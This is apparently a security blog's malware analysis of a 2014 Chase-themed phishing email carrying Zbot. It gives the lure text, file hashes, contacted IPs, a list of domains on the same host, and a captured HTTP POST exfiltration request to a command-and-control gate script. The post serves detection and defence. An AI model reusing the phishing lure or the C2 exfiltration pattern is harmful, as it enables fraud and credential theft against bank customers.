Chase Morgan Phishing Campaign = Zbot


Email:

From: Chase Morgan [mailto:gens@chase.com]
Sent: Tuesday, January 07, 2014 3:36 AM
Subject: Transaction Alert

Dear Customer,
Below attached is copy of the Telegraphic transfer slip as initiated from our bank to your account as instructed by,your adviced to print out copy of transfer slip for confirmation.
Regards,
Dennison Mark
#note they still cant spell šŸ˜›Ā 

# File
Zip File attachment: Payment_Slip.zip
File is actually aĀ Payment Slip.scr

#DFIRĀ 
https://malwr.com/analysis/ZDAxMzRhNWI3YWU5NDQ4NmE4ZGY3ZjNkZjZjOTAzOTI/
FILE NAME Payment Slip.scr
FILE SIZE 229689 bytes
FILE TYPE PE32 executable (GUI) Intel 80386, for MS Windows
MD5 ddf15baab37ffb9d63c8095f6fad20f0
SHA1 c56ca8e346a9ff2f3de9d44d2aa9f6662ddfc8fe
SHA256 84c595902978bf5a9a9343b62c8a650e34b3000355ce8b554887dd4e37989c3e
SHA512 db307fd4c251a8507f5a497353bac95473b02aed3b5b964f303f99e71a0bf65b5e5eb35dc5fed7cd89bc39c85fdb87bdf5e563be49e4525b0a91193a8a578885
CRC32 20434565
SSDEEP 6144:n0PyNAsjNceWItMN8HedzJenWoQAJD0N4YEv2Fkbl:nUG68HmJenWoQsO4ZOFS
YARA
  • shellcode – Matched shellcode byte patterns

Hosts

IP
208.64.67.36
74.125.136.105
74.125.136.94

Domains

DOMAIN IP
balharbourcondo[.]com 208.64.67.36
www.google.com 74.125.136.103
www.google.nl 74.125.136.94

http://balharbourcondo[.]com/item/gate[.]php {exfiltration snippet}
POST /item/gate.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)
Host: balharbourcondo.com
Content-Length: 346
Connection: Keep-Alive
Cache-Control: no-cache

xddcCx1bK-x17xf4Qxc8x0fx03xd9x89xc8Yx9ax1f<xaax82xc3x9exdfx8aTOx07BxdbxeeTxb9xc9xdfxa8xe1x0cxe8xae=x00xb7=ix17xf9xcdx08V0x84x8axa1&"x0fxfa!x1dxdbdxcbvx00x8b^xf4xc7!exa6xef(xbaxacxcbfxfdxb4xa4!T6Vxb1xafgxdbxdcGx96ixfaxa5x95x18%x8cx84TqrrFxc7x8axc3Lx90oxef xe9xf9v"xdc.6-.x00xe1&xd2x03xbaIx98P
xf2x15uxb8*x81xfaYx960Yxd5x0ex90x07o'r`x15xe1vrx14xdax1axe2xadxe5Irxa4xd5xd0x95xca^|tx80xd7xe3zxdb%vx96xa4xc3-!xebx19xd5xe1xb4x92xc6vx84yrIxd6xf5Nxfcwxcax86;xf8xeaxc8Cx94x8axdb|xf4x97Jxa4mxf6dVxa2xedx84G-x91xa6x92?xe9x1exadxfdx87"exafxa6x1ex7fsxdbx80BTbx03x99x19x87xc6xf5@EEtEx04xbaxd9xc5 Gy &/xc2Haxcdxf8xe4xb5x1cxc6Rx83x1cxa4G'xebxa6Pxabx0f:oxf3x1bPxa6xe4Tx9fxa6xf9x16xb4utxaf^Xxcf@xa0x1aZbx0e
xbaJx93x87xd8[x02Exe3xf2xe2'xa5xeeu\xe2xf9^
xb1xe6x8c!Sx9ax18xac,x12xfexacf

..

IP ADDRESSES

First seen Last seen IPs
10/10/13 1/7/14
KNOWN DOMAINS HOSTED BY 208.64.67.36
balharbourcondofl[.]com
bronxdentistny[.]comĀ 
buy400sunnyislescondo[.]comĀ 
ns1[.]thinkwmb[.]ruĀ 
thinkwmb[.]ruĀ 
balharbourcondo[.]comĀ 
posrednikusaebay[.]ruĀ 
serial[.]allz.suĀ 
serialls[.]bizĀ 
balharbourbellini[.]comĀ 
buychateaubeach[.]comĀ 
sunnyislesrealestatecondos[.]comĀ 
buymansionsatacqualina[.]comĀ 
buyporshedesigntower[.]comĀ 
mir-automatiki[.]ruĀ 
sellturnberryoceancolony[.]comĀ 
balharbourmajestictowers[.]comĀ 
stregisandbalharbour[.]comĀ 
ftp[.]deeplogic[.]us

By admin